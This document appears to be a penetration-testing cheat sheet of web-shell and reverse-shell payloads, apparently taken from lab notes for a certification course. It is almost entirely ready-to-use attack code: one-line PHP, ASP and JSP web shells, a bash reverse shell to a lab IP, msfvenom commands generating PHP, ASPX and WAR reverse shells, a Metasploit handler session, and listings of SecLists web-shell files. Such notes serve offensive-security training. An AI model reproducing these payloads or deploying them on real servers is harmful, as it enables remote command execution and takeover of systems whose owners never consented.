Copy <? php system ( $_REQUEST[ 'cmd' ] ) ; ?>
Copy http://SERVER_IP:PORT/uploads/shell.php?cmd=id
Copy <?php echo exec($_GET["cmd"]);?>
Copy <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'"); ?>
Copy <% eval request('cmd') %>
Copy msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
Copy ls /opt/seclists/Web-Shells/
backdoor_list.txt CFM FuzzDB JSP laudanum-1.0 Magento PHP Vtiger WordPress
Copy cp /opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx .
Copy [Apr 08, 2024 - 03:50:25 (EDT)] exegol-CPTS /workspace # locate cmd.php
/opt/seclists/Web-Shells/FuzzDB/cmd.php
[Apr 08, 2024 - 03:51:51 (EDT)] exegol-CPTS /workspace # locate shell.php
/opt/seclists/Web-Shells/PHP/another-obfuscated-phpshell.php
/opt/seclists/Web-Shells/PHP/obfuscated-phpshell.php
/opt/seclists/Web-Shells/WordPress/plugin-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/shell.php
Copy <? php system ( $_REQUEST[ "cmd" ] ) ; ?>
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/ www / html / shell . php
Copy curl http://SERVER_IP:PORT/shell.php?cmd=id
PentestMonkey - Reverse shell
Copy [Apr 08, 2024 - 03:50:32 (EDT)] exegol-CPTS /workspace # locate cmd.jsp
/opt/seclists/Web-Shells/FuzzDB/cmd.jsp
/opt/seclists/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp
/opt/tools/SSRFmap/data/cmd.jsp
/opt/tools/clusterd/src/lib/resources/cmd.jsp
Apr 08, 2024 - 03:52:01 (EDT)] exegol-CPTS /workspace # locate shell.jsp
/opt/seclists/Web-Shells/JSP/simple-shell.jsp
Copy <% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
Copy [Apr 08, 2024 - 03:51:48 (EDT)] exegol-CPTS /workspace # locate shell.asp
/opt/seclists/Web-Shells/laudanum-1.0/asp/shell.asp
Copy <% eval request("cmd") %>
Copy [Apr 08, 2024 - 03:49:48 (EDT)] exegol-CPTS /workspace # locate cmd.aspx
/opt/seclists/Web-Shells/FuzzDB/cmd.aspx
[Apr 08, 2024 - 03:51:08 (EDT)] exegol-CPTS /workspace # locate shell.aspx
/opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx
Copy $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2819 bytes
Copy msf6 exploit(multi/handler) > set LHOST 10.10.14.5
LHOST => 10.10.14.5
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.5:1337
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=443 -f war > shell.war
Copy msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war